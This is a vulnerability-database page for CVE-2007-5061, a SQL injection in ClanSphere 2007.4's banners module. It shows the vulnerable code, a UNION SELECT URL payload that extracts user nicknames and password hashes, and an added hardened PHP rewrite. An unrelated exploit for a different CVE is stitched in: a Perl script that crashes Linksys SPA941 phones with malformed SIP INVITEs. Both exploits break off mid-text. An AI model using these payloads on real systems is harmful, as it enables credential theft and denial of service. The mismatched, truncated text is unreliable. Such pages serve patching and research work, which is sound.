CVE-2007-5061
Published 2007-09-24
Priority P339 | high | 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.17% (63.4th percentile)
SQL injection vulnerability in mods/banners/navlist.php in Clansphere 2007.4 allows remote attackers to execute arbitrary SQL commands via the cat_id parameter to index.php in a banners action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| clansphere | clansphere | — | — |
No detection rules found.
Exploit-DB
ClanSphere 2007.4 - 'cat_id' SQL Injection
exploitdb·2007-09-22
CVE-2007-5061 ClanSphere 2007.4 - 'cat_id' SQL Injection
---
#########################################################################################
#
# Inclusion Hunter Team
# http://www.ihteam.net
#
#
# [Clansphere 2007.4]
#
#
# Class: SQL Injection
# Found: 22/09/2007
# Remote: Yes
# Site: http://www.clansphere.net/
# Download: http://sourceforge.net/project/showfiles.php?group_id=95430
#
#########################################################################################
Vulnerable code:
mods/banners/navlist.php
if(!empty($_GET['cat_id'])) {
    $where = "categories_id = '" . $_GET['cat_id'] . "'";
Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,null%20FR
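The hardened counterpart of the `navlist.php` snippet above, as an added example that is not ClanSphere's code or its actual patch: `cat_id` is validated as a positive integer and bound as a parameter, so the result does not depend on `magic_quotes_gpc` (removed in PHP 5.4). The `banners` table layout, the `banners_name` column and both helper names are constructed for illustration; only `categories_id` and `cat_id` come from the page.

```php
<?php
// Added example, not ClanSphere code. Table layout and helper names are constructed.

/**
 * Build the WHERE fragment for the banner list from request input.
 * Returns [sql, params]; the cat_id value never becomes part of the SQL text.
 */
function banner_filter(array $query): array
{
    if (!isset($query['cat_id']) || $query['cat_id'] === '') {
        return ['1 = 1', []];            // no category requested: no filter
    }
    // A category id is a positive integer; anything else (strings with quotes,
    // arrays from cat_id[]=..., negative numbers) is rejected outright.
    $id = filter_var($query['cat_id'], FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('cat_id must be a positive integer');
    }
    return ['categories_id = :cat_id', [':cat_id' => $id]];
}

function list_banners(PDO $db, array $query): array
{
    [$where, $params] = banner_filter($query);
    // $where is one of two fixed strings chosen above, never request data.
    $stmt = $db->prepare("SELECT banners_name FROM banners WHERE $where");
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed in-memory data so the script runs offline (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE banners (banners_name TEXT, categories_id INTEGER)");
$db->exec("INSERT INTO banners VALUES ('sponsor-a', 1), ('sponsor-b', 2)");

print_r(list_banners($db, ['cat_id' => '2']));       // legitimate request

// Constructed hostile value: a quote followed by extra SQL is refused before any query runs.
try {
    list_banners($db, ['cat_id' => "2' OR '1'='1"]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```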
Exploit-DB
Linksys SPA941 - Remote Reboot (Denial of Service)
exploitdb·2007-04-24
CVE-2007-2270 Linksys SPA941 - Remote Reboot (Denial of Service)
---
#!/usr/bin/perl
use IO::Socket;
#die "Usage $0 " unless ($ARGV[2]);
die "Usage $0 " unless ($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377;tag=779\r
To: Receiver \r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 \r
Expire
No writeups or analysis indexed.
http://osvdb.org/37260
http://secunia.com/advisories/26940
http://www.securityfocus.com/bid/25770
http://www.vupen.com/english/advisories/2007/3249
https://exchange.xforce.ibmcloud.com/vulnerabilities/36744
https://www.exploit-db.com/exploits/4443
Published: 2007-09-24